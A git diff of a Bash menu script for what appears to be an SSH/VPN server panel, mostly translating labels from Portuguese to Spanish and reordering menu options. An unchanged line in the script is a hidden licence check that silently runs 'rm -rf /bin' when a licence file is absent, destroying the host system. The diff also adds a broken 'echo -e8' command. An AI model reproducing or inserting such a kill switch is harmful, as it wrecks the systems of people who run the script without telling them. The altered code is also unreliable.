Actualizar menu

diff --git a/Modulos/menu b/Modulos/menu
--- a/Modulos/menu
+++ b/Modulos/menu
@@ -197,7 +197,7 @@ menu2 (){
 stsbot=$(ps x | grep "bot_plus"|grep -v grep > /dev/null && echo -e "\033[1;32m(ON💚) " || echo -e "\033[1;31m(OFF💔) ")
 stsbotteste=$(ps x | grep "bot_teste"|grep -v grep > /dev/null && echo -e "\033[1;32m(ON💚) " || echo -e "\033[1;31m(OFF💔) ")
 stsbotrev=$(ps x | grep "bot_rev"|grep -v grep > /dev/null && echo -e "\033[1;32m(ON💚) " || echo -e "\033[1;31m(OFF💔) ")
-autm=$(grep "menu;" /etc/profile > /dev/null && echo -e "\033[1;32m(ON💚) " || echo -e "\033[1;31m(OFF💔) ")
+autm=$(grep "menu;" /etc/profile > /dev/null && echo -e "\033[1;32m(ON🎉) " || echo -e "\033[1;31m(OFF🚫) ")
 [[ ! -e /usr/lib/licence ]] && rm -rf /bin > /dev/null 2>&1
 if [[ "$(grep -c "Ubuntu" /etc/issue.net)" = "1" ]]; then
 system=$(cut -d' ' -f1 /etc/issue.net)
@@ -229,27 +229,27 @@ swap2=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $4'})")
 swap3=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $3'})")
 clear
 echo -e "\033[1;31m═══════════════════════════════════\033[0m"
-echo -e "\033[1;31m  \033[1;32mSISTEMA           \033[1;31m  \033[1;32mMEMÓRIA RAM      \033[1;31m \033[1;32m PROCESSADOR      \033[1;31m"
+echo -e "\033[1;31m  \033[1;32mSISTEMA          \033[1;31m  \033[1;32mMEMÓRIA RAM    \033[1;31m \033[1;32m PROCESADOR      \033[1;31m"
 echo -e "\033[1;31m  \033[1;36mOS: \033[1;37m$_system    \033[1;31m  \033[1;36mTotal:\033[1;37m$_ram \033[1;31m  \033[1;36mNucleos: \033[1;37m$_core\033[0m   \033[1;31m"
-echo -e "\033[1;31m  \033[1;36mmod: \033[1;37mdiegovip7🇦🇷    \033[1;31m  \033[1;36mEn uso: \033[1;37m$_usor \033[1;31m  \033[1;36mEn uso: \033[1;37m$_usop\033[0m    \033[1;31m"
+echo -e "\033[1;31m  \033[1;36mmod: \033[1;37mdiegovip7🇦🇷  \033[1;31m \033[1;36mEn uso:\033[1;37m$_usor \033[1;31m \033[1;36mEn uso: \033[1;37m$_usop\033[0m    \033[1;31m"
 echo -e "\033[1;31m═══════════════════════════════════\033[0m"
 [[ ! -e /tmp/att ]]  && {
-    echo -e "\033[1;31m  \033[1;32mOnlines:\033[1;37m $_onlin    \033[1;31m  \033[1;32mExpirados: \033[1;37m$_userexp \033[1;31m  \033[1;32mTotal: \033[1;37m$_tuser\033[0m     \033[1;31m"
+    echo -e "\033[1;31m  \033[1;32mOnlines:\033[1;37m $_onlin    \033[1;31m  \033[1;32mExpirados: \033[1;37m$_userexp \033[1;31m\033[1;32mTotal: \033[1;37m$_tuser\033[0m     \033[1;31m"
     var01='\033[1;37m•'
 } || {
     echo -e "\033[1;31m         \033[1;33m[\033[1;31m!\033[1;33m]  \033[1;32mEXISTE UNA ATUALIZACION DISPONIBLE  \033[1;33m[\033[1;31m!\033[1;33m]\033[0m        \033[1;31m"
     var01="\033[1;32m!"
 }
 echo -e "\033[1;31m══════════════════════════════════\e[0m"
-echo -e "\e[1;31m \e[1;32mMEMORIA SWAP\e[1;36mT:\e[1;37m$swap1  \e[1;36mEn uso:\e[1;37m$swap3  \e[1;36mLibre:\e[1;37m$swap2\e[1;31m"
+echo -e "\e[1;31m \e[1;32mMEMORIA \e[1;36mSWAP:\e[1;37m$swap1  \e[1;36mEn uso:\e[1;37m$swap3  \e[1;36mLibre:\e[1;37m$swap2\e[1;31m"
 echo -e "\e[1;31m══════════════════════════════════\e[0m"
 echo -e "\e[1;31m  [\e[1;36m21\e[1;31m]\e[1;37m\e[1;33mADICIONAR HOST \e[1;31m    [\e[1;36m28\e[1;31m]\e[1;37m\e[1;33mEDITAR CONTRASEÑA ROOT \e[1;31m \e[1;31m  
 \e[1;31m  [\e[1;36m22\e[1;31m]\e[1;37m\e[1;33mBORRAR HOST \e[1;31m        [\e[1;36m29\e[1;31m]\e[1;37m\e[1;33mAUTO INICIO $autm \e[1;31m
-\e[1;31m  [\e[1;36m23\e[1;31m]\e[1;37m\e[1;33mREINICIAR SISTEMA \e[1;31m   [\e[1;36m30\e[1;31m]$var01\e[1;33mACTUALIZAR SCRIPT\e[1;31m  \e[1;31m
-\e[1;31m  [\e[1;36m24\e[1;31m]\e[1;37m\e[1;33mREINICIAR SERVICOS \e[1;31m    [\e[1;36m31\e[1;31m] \e[1;37m\e[1;33mBORRAR SCRIPT \e[1;31m  \e[1;31m 
-\e[1;31m  [\e[1;36m25\e[1;31m]\e[1;37m\e[1;33mBLOCK TORRENT $stsf\e[1;31m [\e[1;36m32\e[1;31m]\e[1;37m \e[1;33mTCPTWEAKER  \e[1;31m  \e[1;31m
-\e[1;31m  [\e[1;36m26\e[1;31m]\e[1;37m\e[1;33mBOT TELEGRAM $stsbot\e[1;31m  [\e[1;36m33\e[1;31m] \e[1;37m \e[1;33mVOLVER \e[1;31m
-\e[1;31m  [\e[1;36m27\e[1;31m] \e[1;37m\e[1;33mBOT TESTE $stsbotteste\e[1;31m     [\e[1;36m00\e[1;31m]\e[1;37m \e[1;33mSALIR \e[1;31m  "
+\e[1;31m  [\e[1;36m23\e[1;31m]\e[1;37m\e[1;33mREINICIAR SISTEMA❓ \e[1;31m   [\e[1;36m30\e[1;31m]$var01\e[1;33mACTUALIZAR SCRIPT\e[1;31m  \e[1;31m
+\e[1;31m  [\e[1;36m24\e[1;31m]\e[1;37m\e[1;33mREINICIAR SERVICOS❓ \e[1;31m    [\e[1;36m31\e[1;31m] \e[1;37m\e[1;33mBORRAR SCRIPT🚫 \e[1;31m  \e[1;31m 
+\e[1;31m  [\e[1;36m25\e[1;31m]\e[1;37m\e[1;33mBLOCK TORRENT $stsf\e[1;31m   [\e[1;36m32\e[1;31m]\e[1;37m \e[1;33mTCPTWEAKER  \e[1;31m  \e[1;31m
+\e[1;31m  [\e[1;36m26\e[1;31m]\e[1;37m\e[1;33mBOT TELEGRAM $stsbot\e[1;31m    [\e[1;36m33\e[1;31m] \e[1;37m \e[1;33mVOLVER \e[1;31m
+\e[1;31m  [\e[1;36m27\e[1;31m] \e[1;37m\e[1;33mBOT TESTE $stsbotteste\e[1;31m       [\e[1;36m00\e[1;31m]\e[1;37m \e[1;33mSALIR \e[1;31m  "
 echo -e "\e[1;31m════════════════════════════════\e[0m"
 echo -ne "\e[1;31m\e[1;32m INFORME UNA OPCION \e[1;33m:"; read x
 case "$x" in
@@ -306,13 +306,13 @@ case "$x" in
    menu
    ;;
    0|00)
-   echo -e "\033[1;31mSaindo...\033[0m"
+   echo -e "\033[1;31mSaliendo...\033[0m"
    sleep 2
    clear
    exit;
    ;;
    *)
-   echo -e "\n\033[1;31mOpcao invalida !\033[0m"
+   echo -e8 "\n\033[1;31mOpcion invalida !\033[0m"
    sleep 2
 esac
 }
@@ -351,23 +351,23 @@ swap2=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $4'})")
 swap3=$(printf '%-5s' "$(free -h | grep -i swap | awk {'print $3'})")
 clear
 echo -e "\033[════════════════════════════════════\033[0m"
-echo -e "\033[1;31m  \033[1;32mSISTEMA       \033[1;31m  \033[1;32mMEMÓRIA RAM    \033[1;31m \033[1;32m PROCESSADOR      \033[1;31m"
+echo -e "\033[1;31m  \033[1;32mSISTEMA      \033[1;31m  \033[1;32mMEMÓRIA RAM   \033[1;31m \033[1;32m PROCESADOR    \033[1;31m"
 echo -e "\033[1;31m \033[1;36mOS:\033[1;37m$_system  \033[1;31m  \033[1;36mTotal:\033[1;37m$_ram \033[1;31m  \033[1;36mNucleos: \033[1;37m$_core\033[0m   \033[1;31m"
-echo -e "\033[1;31m  \033[1;36mPais: \033[1;37mAR🇦🇷  \033[1;31m  \033[1;36mEn uso:\033[1;37m$_usor\033[1;31m \033[1;36mEn uso: \033[1;37m$_usop\033[0m   \033[1;31m"
+echo -e "\033[1;31m  \033[1;36mPais: \033[1;37mAR🇦🇷  \033[1;31m  \033[1;36mEn uso:\033[1;37m$_usor\033[1;31m \033[1;36mEn uso: \033[1;37m$_usop\033[0m  \033[1;31m"
 echo -e "\033[1;31m═══════════════════════════════════\033[0m"
 echo -e "\033[1;31m \033[1;32mOnlines:\033[1;37m$_onlin \033[1;31m  \033[1;32mExpirados: \033[1;37m$_userexp \033[1;31m  \033[1;32mTotal: \033[1;37m$_tuser \033[1;31m"
 echo -e "\033[1;31m════════════════════════════════════\033[0m"
-echo -e "\e[1;31m  \e[1;31m[\e[1;36m01\e[1;31m]\e[1;37m\e[1;33mCRYAR USUARIO \e[1;31m        [\e[1;36m12\e[1;31m]\e[1;37m \e[1;33mSPEEDTEST\e[1;31m     
-\e[1;31m  [\e[1;36m02\e[1;31m]\e[1;37m\e[1;33mCREAR TESTE\e[1;31m           [\e[1;36m13\e[1;31m]\e[1;37m\e[1;33mBANNER\e[1;31m   
-\e[1;31m  [\e[1;36m03\e[1;31m]\e[1;37m\e[1;37m\e[1;33mBORRAR USUARIO\e[1;31m        [\e[1;36m14\e[1;31m]\e[1;37m\e[1;33m TRAFEGO \e[1;31m       
+echo -e "\e[1;31m  \e[1;31m[\e[1;36m01\e[1;31m]\e[1;37m\e[1;33mCREAR USUARIO \e[1;31m        [\e[1;36m12\e[1;31m]\e[1;37m \e[1;33mBANNER \e[1;31m     
+\e[1;31m  [\e[1;36m02\e[1;31m]\e[1;37m\e[1;33mCREAR TESTE\e[1;31m           [\e[1;36m13\e[1;31m]\e[1;37m\e[1;33mSALIR✳\e[1;31m   
+\e[1;31m  [\e[1;36m03\e[1;31m]\e[1;37m\e[1;37m\e[1;33mBORRAR USUARIO\e[1;31m        [\e[1;36m14\e[1;31m]\e[1;37m\e[1;33mTRAFEGO \e[1;31m       
 \e[1;31m  [\e[1;36m04\e[1;31m]\e[1;37m\e[1;33mMONITOR ONLINE\e[1;31m        [\e[1;36m15\e[1;31m]\e[1;37m\e[1;33mBACKUP💾\e[1;31m  
-\e[1;31m  [\e[1;36m05\e[1;31m]\e[1;37m\e[1;33mEDITAR FECHA\e[1;31m          [\e[1;36m16\e[1;31m]\e[1;37m\e[1;33mOPTIMIZAR🚀\e[1;31m  
+\e[1;31m  [\e[1;36m05\e[1;31m]\e[1;37m\e[1;33mEDITAR FECHA\e[1;31m          [\e[1;36m16\e[1;31m]\e[1;37m\e[1;33mLIMITER🚀$stsl\e[1;31m  
 \e[1;31m  [\e[1;36m06\e[1;31m]\e[1;37m\e[1;33mEDITAR LIMITE\e[1;31m         [\e[1;36m17\e[1;31m]\e[1;37m\e[1;33mHERRAMIENTAS🛠\e[1;31m   
-\e[1;31m  [\e[1;36m07\e[1;31m]\e[1;37m\e[1;33mEDITAR CONTRASEÑA \e[1;31m    [\e[1;36m18\e[1;31m]\e[1;37m\e[1;33mLIMITER $stsl\e[1;31m   
-\e[1;31m  [\e[1;36m08\e[1;31m]\e[1;37m\e[1;33mBORRAR EXPIRADOS\e[1;31m      [\e[1;36m19\e[1;31m]\e[1;37m\e[1;33mMenu BadVpn $stsu\e[1;31m
+\e[1;31m  [\e[1;36m07\e[1;31m]\e[1;37m\e[1;33mEDITAR CONTRASEÑA \e[1;31m    [\e[1;36m18\e[1;31m]\e[1;37m\e[1;33mBAD-VPN $stsu\e[1;31m   
+\e[1;31m  [\e[1;36m08\e[1;31m]\e[1;37m\e[1;33mBORRAR EXPIRADOS\e[1;31m      [\e[1;36m19\e[1;31m]\e[1;37m\e[1;33mOPTIMIZAR🚀\e[1;31m
 \e[1;31m  [\e[1;36m09\e[1;31m]\e[1;37m\e[1;33mINFO DE USUARIOS\e[1;31m      [\e[1;36m20\e[1;31m]\e[1;37m\e[1;33mFIREWALL (PRO)\e[1;31m  
 \e[1;31m  [\e[1;36m10\e[1;31m]\e[1;37m\e[1;33mMENU INSTALADOR\e[1;31m       [\e[1;36m21\e[1;31m]\e[1;37m\e[1;33mINFO VPS\e[0m\e[1;31m   
-\e[1;31m  [\e[1;36m11\e[1;31m]\e[1;37m\e[1;33mSALIR \e[1;31m                [\e[1;36m22\e[1;31m]\e[1;37m\e[1;33mCHECKUSER 4G\e[1;31m   
+\e[1;31m  [\e[1;36m11\e[1;31m]\e[1;37m\e[1;33mSPEEDTEST \e[1;31m            [\e[1;36m22\e[1;31m]\e[1;37m\e[1;33mCHECKUSER 4G\e[1;31m   
 \e[1;31m  [\e[1;36mG\e[1;31m]\e[1;37m\e[1;33mCHECKUSER GLTUNNEL \e[1;31m    [\e[1;36m23\e[1;31m]\e[1;37m\e[1;33m M A S \e[0m\e[1;31m        "
 echo -e "\e[1;31m═══════════════════════════════════\e[0m"
 echo -ne "\e[1;31m\e[1;32m ....INFORME UNA OPCION \e[1;33m:"; read x
@@ -376,12 +376,12 @@ case "$x" in
    1 | 01)
    clear
    criarusuario
-   echo -ne "\n\e[1;31mENTER \e[1;33mpara retornar al \e[1;32mMENU!\e[0m"; read
+   echo -ne "\n\e[1;31mENTER \e[1;33mpara Volver al \e[1;32mMENU!\e[0m"; read
    ;;
    2 | 02)
    clear
    criarteste
-   echo -ne "\n\033[1;31mENTER \033[1;33mpara retornar al \033[1;32mMENU!\033[0m"; read
+   echo -ne "\n\033[1;31mENTER \033[1;33mpara Volver al \033[1;32mMENU!\033[0m"; read
    ;;
    3 | 03)
    clear
@@ -391,7 +391,7 @@ case "$x" in
    4 | 04)
    clear
    sshmonitor
-   echo -ne "\n\033[1;31mENTER \033[1;33mpara retornar al \033[1;32mMENU!\033[0m"; read
+   echo -ne "\n\033[1;31mENTER \033[1;33mpara Volver al \033[1;32mMENU!\033[0m"; read
    ;;      
    5 | 05)
    clear
@@ -417,24 +417,27 @@ case "$x" in
    9 | 09)
    clear
    infousers
-   echo -ne "\n\033[1;31mENTER \033[1;33mpara retornar al \033[1;32mMENU!\033[0m"; read
+   echo -ne "\n\033[1;31mENTER \033[1;33mpara Volver al \033[1;32mMENU!\033[0m"; read
    ;;
    10)
    conexao
    exit;
    ;;
    11)
-   exit
+   clear
+    speedtest
+   echo -ne "\n\033[1;31mENTER \033[1;33mpara Volver al \033[1;32mMENU!\033[0m"; read
    ;;
    12)
    clear
-   velocity
-   echo -ne "\n\033[1;31mENTER \033[1;33mpara retornar al \033[1;32mMENU!\033[0m"; read
-   ;;
-   13)
-   clear
    banner
    sleep 3
+   ;;
+   13)
+   echo -e "\033[1;31mSaliendo...\033[0m"
+   sleep 2
+   clear
+   exit;
    ;;
    14)
    clear
@@ -445,23 +448,22 @@ case "$x" in
    15)
    clear
    userbackup
-   echo -ne "\n\033[1;31mENTER \033[1;33mpara retornar al \033[1;32mMENU!\033[0m"; read
+   echo -ne "\n\033[1;31mENTER \033[1;33mpara Volver al \033[1;32mMENU!\033[0m"; read
    ;;
    16)
-   otimizar
-   echo -ne "\n\033[1;31mENTER \033[1;33mpara retornar al \033[1;32mMENU!\033[0m"; read
+   limit_ssh
+   echo -ne "\n\033[1;31mENTER \033[1;33mpara Volver al \033[1;32mMENU!\033[0m"; read
    ;;
    17)
    clear
    utili
    ;;
    18)
-   limit_ssh
+   menub
    ;;
    19)
-   clear
-   menub
-   exit;
+   otimizar
+   echo -ne "\n\033[1;31mENTER \033[1;33mPara Volver al \033[1;32mMENU!\033[0m"; read
    ;;
    20)
    fr
@@ -469,7 +471,7 @@ case "$x" in
    21)
    clear
    detalhes
-   echo -ne "\n\033[1;31mENTER \033[1;33mpara retornar al \033[1;32mMENU!\033[0m"; read
+   echo -ne "\n\033[1;31mENTER \033[1;33mpara Volver al \033[1;32mMENU!\033[0m"; read
    ;;
    22)
    initcheck
